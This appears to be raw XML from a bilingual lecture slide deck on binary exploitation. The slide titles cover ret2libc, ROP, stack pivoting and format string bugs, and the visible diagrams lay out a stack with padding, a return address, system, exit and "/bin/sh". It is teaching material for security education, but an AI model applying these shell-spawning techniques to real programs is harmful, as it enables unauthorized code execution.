          <a:xfrm>
            <a:off x="7046627" y="3844400"/>
            <a:ext cx="2095200" cy="16268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padding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430" name="Shape 1430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="1796400"/>
            <a:ext cx="2095200" cy="4096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0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431" name="Shape 1431"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226260" y="3025200"/>
            <a:ext cx="1282800" cy="4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return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address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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1432" name="Shape 1432"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1431" idx="3"/>
            <a:endCxn id="1427" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6509060" y="3230000"/>
            <a:ext cx="537600" cy="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33" name="Shape 1433"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1431" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4641060" y="3230000"/>
            <a:ext cx="585200" cy="172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34" name="Shape 1434"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9411527" y="1821133"/>
            <a:ext cx="21200" cy="36412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435" name="Shape 1435"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9509960" y="3321366"/>
            <a:ext cx="1183600" cy="4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Overflow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436" name="Shape 1436"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9509960" y="1739333"/>
            <a:ext cx="2496800" cy="9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system("/bin/sh")</a:t>
            </a:r>
            <a:endParaRPr sz="1867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exit(0)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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437" name="Shape 1437"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255460" y="1990333"/>
            <a:ext cx="1630800" cy="4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high address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438" name="Shape 1438"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255460" y="5061600"/>
            <a:ext cx="1630800" cy="4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low address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FE79ABDA-DE19-4990-B8CC-CA9DDE838390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc</a:t>
            </a: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4" name="Shape 1444"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2494067"/>
            <a:ext cx="2095200" cy="4096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"/bin/sh"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445" name="Shape 1445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2903667"/>
            <a:ext cx="2095200" cy="4096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exit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446" name="Shape 1446"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="3313267"/>
            <a:ext cx="2095200" cy="4096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system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447" name="Shape 1447"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="3722867"/>
            <a:ext cx="2095200" cy="4096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padding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448" name="Shape 1448"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="4132467"/>
            <a:ext cx="2095200" cy="16268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padding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449" name="Shape 1449"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="2084467"/>
            <a:ext cx="2095200" cy="4096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0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450" name="Shape 1450"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671600" y="3518067"/>
            <a:ext cx="848800" cy="4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ESP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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1451" name="Shape 1451"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="3722867"/>
            <a:ext cx="5376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52" name="Shape 1452"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9471400" y="2109200"/>
            <a:ext cx="21200" cy="36412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453" name="Shape 1453"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="3609433"/>
            <a:ext cx="1183600" cy="4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Overflow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454" name="Shape 1454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="2027400"/>
            <a:ext cx="2496800" cy="9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system("/bin/sh")</a:t>
            </a:r>
            <a:endParaRPr sz="1867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exit(0)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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455" name="Shape 1455"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="3819267"/>
            <a:ext cx="2882800" cy="25044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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867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system:</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867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push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867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...(execute command)</a:t>
            </a:r>
            <a:endParaRPr sz="1867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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1456" name="Shape 1456"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="288252" y="3182797"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1457" name="Shape 1457"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1600" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1600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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="1458" name="Shape 1458"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="1459" name="Shape 1459"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="1763367"/>
            <a:ext cx="2882800" cy="18292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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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stack overflow:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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mov ebp, esp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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...</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern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ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr sz="1867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0E703D33-266A-4DA4-8429-64485256C9C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc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1_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12785</TotalTime>
  <Words>16401</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>2628</Paragraphs>
  <Slides>187</Slides>
  <Notes>146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187</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="201" baseType="lpstr">
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>华文隶书</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>隶书</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>1_Simple Light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动态链接相关结构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ROP连续调用多个libc函数</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>栈迁移</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>栈迁移</vt:lpstr>
      <vt:lpstr>栈迁移</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>x64 ROP</vt:lpstr>
      <vt:lpstr>__libc_csu_init Gadgets for x64</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Integer Overflow</vt:lpstr>
      <vt:lpstr>Integer Overflow in Linux kernel</vt:lpstr>
      <vt:lpstr>Integer Overflow Quiz</vt:lpstr>
      <vt:lpstr>Format String</vt:lpstr>
      <vt:lpstr>Format String Vuln Discovered(year2000)</vt:lpstr>
      <vt:lpstr>Format String related Functions</vt:lpstr>
      <vt:lpstr>Format String syntax</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Code Exec</vt:lpstr>
      <vt:lpstr>Format String Usage</vt:lpstr>
      <vt:lpstr>Format String Strategy</vt:lpstr>
      <vt:lpstr>Format String tricks and gotchas</vt:lpstr>
      <vt:lpstr>Format String tricks and gotchas</vt:lpstr>
      <vt:lpstr>Format String Challenge</vt:lpstr>
      <vt:lpstr>Format String Tools and Ref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IZAYOI</dc:creator>
  <cp:lastModifiedBy>y hm</cp:lastModifiedBy>
  <cp:revision>431</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-03T14:32:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-13T06:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>